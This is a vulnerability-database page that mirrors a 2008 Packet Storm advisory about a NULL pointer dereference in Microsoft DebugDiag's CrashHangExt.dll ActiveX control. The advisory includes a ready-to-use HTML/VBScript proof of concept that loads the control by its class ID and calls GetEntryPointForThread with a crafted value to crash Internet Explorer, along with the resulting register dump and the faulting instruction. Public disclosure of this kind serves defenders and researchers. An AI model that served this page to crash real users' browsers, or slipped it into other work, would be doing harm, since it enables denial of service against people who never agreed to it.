Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

debugdiag-null.txt

🗓️ 30 Oct 2008 00:00:00Reported by suN8HclfType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

DebugDiag NULL Pointer Dereference in Internet Explore

Code
`Name : DebugDiag (CrashHangExt.dll 1.0) NULL Pointer Dereference  
Credit : suN8Hclf (DaRk-CodeRs Group), [email protected]  
Download : http://www.microsoft.com/downloads/details.aspx?FamilyID=28bd5941-c458-46f1-b24d-f60151d875a3&displaylang=en#Overview  
Greetz : Luigi Auriemma, Louis Carriere, 0in, cOndemned, e.wiZz!, Gynvael Coldwind, Myo  
Katharsis, all fron #dark-coders  
  
=+ Product of Fuzzing +=  
  
This code should crash down Internet Explorer  
Tested on:  
+ Windows XP SP2 (full patched) & IE 6.0 (full patched)  
+ Windows 2000 SP 4 (full patched) & IE 6.0 (full patched)  
  
Marked as:  
================================================  
Class Utils  
GUID: {7233D6F8-AD31-440F-BAF0-9E7A292A53DA}  
Number of Interfaces: 1  
Default Interface: IUtils  
  
RegKey Safe for Script: False  
RegkeySafe for Init: False  
KillBitSet: False  
================================================  
  
  
Exploit:  
~~~~~~~~~~~~~~~~~~~~~~  
  
-----------------------code.htm--------------------------  
<body>  
<object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' />  
</object>  
<script language='vbscript'>  
arg1=-2147483647  
  
target.GetEntryPointForThread arg1   
</script>  
</body>  
-----------------------code.htm--------------------------  
  
  
Info  
~~~~~~~~~~~~~~~~~~~~~~  
EAX 00000000  
ECX 0012DDDC  
EDX 001E98EA  
EBX 02C318E8 CrashHan.02C318E8  
ESP 0012DD88  
EBP 0012DE04  
ESI 023F1FE0  
EDI 00000000  
EIP 02C38290 CrashHan.02C38290  
  
IE crashes while trying to execute this line (Null pointer dereference):  
02C38290 8B08 MOV ECX,DWORD PTR DS:[EAX]  
  
  
//www.dark-coders.pl  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Oct 2008 00:00Current
debugdiagnull pointerinternet explorerexploitcrashfuzzingwindows xpwindows 2000vulnerabilitycode execution
28